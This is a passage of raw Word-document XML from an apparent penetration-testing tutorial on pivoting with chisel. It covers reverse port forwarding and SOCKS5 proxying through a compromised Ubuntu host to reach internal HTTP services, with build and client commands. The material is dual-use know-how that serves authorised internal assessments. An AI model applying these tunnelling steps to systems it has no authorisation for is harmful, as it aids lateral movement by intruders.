          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Local Port forwarding Example – 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4071E7" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>There is another way to access the HTTP service using the attacker’s IP address instead of the loopback interface this time. We will be required to install a chisel in the target machine to achieve the goal. In this example, we are using the ubuntu system. As the chisel is written in Golang language, we need to install Golang in the target system using the below command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5E7C11" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26CA6727" w14:textId="22B520EE"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E76A1C" wp14:editId="4EB22152">
            <wp:extent cx="5364480" cy="2194560"/>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64480" cy="2194560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE407E1" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we download a chisel from its official repository to install it in the target system. Go build is an automatic build tool that aims to replace Make files for simple projects written in the Go programming language. It creates a dependency graph of all local imports and compiles them in the correct order using the GC Go compiler. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ldflags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> stands for linker flags and is used to pass in flags to the underlying linker in the Go toolchain. The -s and -w linker flags are not strictly needed, but they decrease the size of the resulting binary. By navigating the download folder of the chisel, we simply installed it with the help of go build.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700F0BDE" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>git clone https:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-c0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="9999AA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//github.com/jpillora/chisel.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C472848" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20E10389" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>go build -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ldflags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-s0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"-s -w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73516D24" w14:textId="415658E7"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43DE97FA" wp14:editId="4C67B34C">
            <wp:extent cx="5731510" cy="150876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1508760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D4FE22" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Then we set up a chisel server on port 5000 in the attacking box as in the previous example. In the last example, we accessed it from the attacking box loopback interface, connecting to the service hosted in the remote internal network. This time we will access the HTTP service on port 8888 on the attacker side. Ubuntu machine, our client, will establish a connection with the remote server (192.168.1.205) and port 5000. Once a tunnel is created, it will allow accessing the HTTP service hosted in loopback (127.0.0.1) on remote port 8888.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2726222A" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel client </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>205</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> R:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8888</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:localhost:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF9677E" w14:textId="773DA1E9"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D792990" wp14:editId="0903F0E8">
            <wp:extent cx="5731510" cy="581025"/>
            <wp:effectExtent l="0" t="0" r="254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581025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07043C7F" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>When a connection is established with the chisel server, we can access the HTTP service from the attacking box on port 8888.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48918105" w14:textId="1042B16C"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C3C47B0" wp14:editId="2BCDC671">
            <wp:extent cx="5265420" cy="24231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65420" cy="2423160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="110F6F17" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Establish Connection with SOCKS5 Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182589C5" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>During the internal assessment, we may come across when we compromise a system, and that system is communicating with another system using a different adaptor or a different subnet. It can be checked using ipconfig/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, where we can view if that system is connected to a different network via a different adapter. In such scenarios, local port forwarding will not work, and we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> identify which ports are open for the outbound traffic. As shown in the screenshot below, we could not establish a connection with the remote host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322F7D2" w14:textId="7C659F7D"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F9704A0" wp14:editId="6A168127">
            <wp:extent cx="5731510" cy="3957320"/>
            <wp:effectExtent l="0" t="0" r="254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957320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A2867" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">To overcome this issue, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> go through multiple steps. First, we set up a chisel server in the attacking box on port 8000. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123CCDAA" w14:textId="42CB7BED"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F99583A" wp14:editId="777E4935">
            <wp:extent cx="5731510" cy="87820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878205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AAA8DB" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we establish a connection with the chisel server from the ubuntu box mentioning remote access on socks proxy. Just like most other proxy types, SOCKS proxies hide the client’s IP address and serve when bypassing geo-restrictions. Unlike HTTP, SOCKS cannot interpret web data. However, they are mainly used to facilitate communication with websites with firewalls and limit regular client access. All communication can be done on SOCKS5 proxy using utilities such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>proxychains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> or proxychain4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1CB8F1" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>: listening port of the server (attacking box)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EFD829" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>–socks5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>: start an internal SOCKS4/SOCKS5 proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374451DF" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>–reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>: allows reverse port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53059B99" w14:textId="4569F11A"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08DA6458" wp14:editId="0A785538">
            <wp:extent cx="5731510" cy="546100"/>
            <wp:effectExtent l="0" t="0" r="254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546100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F1048" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>We can also access an individual target’s port using the command below. We connect with the server hosted in the Attacking machine and then access the target service via a tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D904983" w14:textId="0FAA8B45"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D482B15" wp14:editId="21FD5B76">
            <wp:extent cx="5731510" cy="42100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421005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6360F8A2" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Also, we can specify socks proxy while setting up the chisel server. In the below example, we have set up a chisel server on port 9001 using the socks5 proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2F5B16" w14:textId="4537C3D6"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14A9976D" wp14:editId="7DBC8B45">
            <wp:extent cx="5731510" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="254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619125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6149D" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">All the above setup is done at the system level, but how will the browser know we want to access HTTP service? So, we configured it in the browser as well. Otherwise, we cannot browse any HTTP or H TTPS services. To do that, we manually configured our browser by navigating settings as proxy SOCKS and a host as loopback interface IP address, 127.0.0.1, and SOCKS version such as SOCKS4 or SOCKS5, which depend on the version we are using. In this example, we are using SOCKS5 and port number 1080. And no proxy for the loopback interface. It can also be done using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>foxyproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> addon available in Mozilla Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1198A9" w14:textId="4A3835F6"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4922FF6C" wp14:editId="27CEF921">
            <wp:extent cx="5731510" cy="625284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6252845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A6C21" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Now we can access the services without any issues. We can verify accessing the target HTTP service where the request will send via a proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2F492" w14:textId="21D78E84"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noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EADAF5E" wp14:editId="7EDA901C">
            <wp:extent cx="5731510" cy="367855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3678555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D62ED" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure SOCKS5 in proxychains4.conf </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="46A8E86D" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
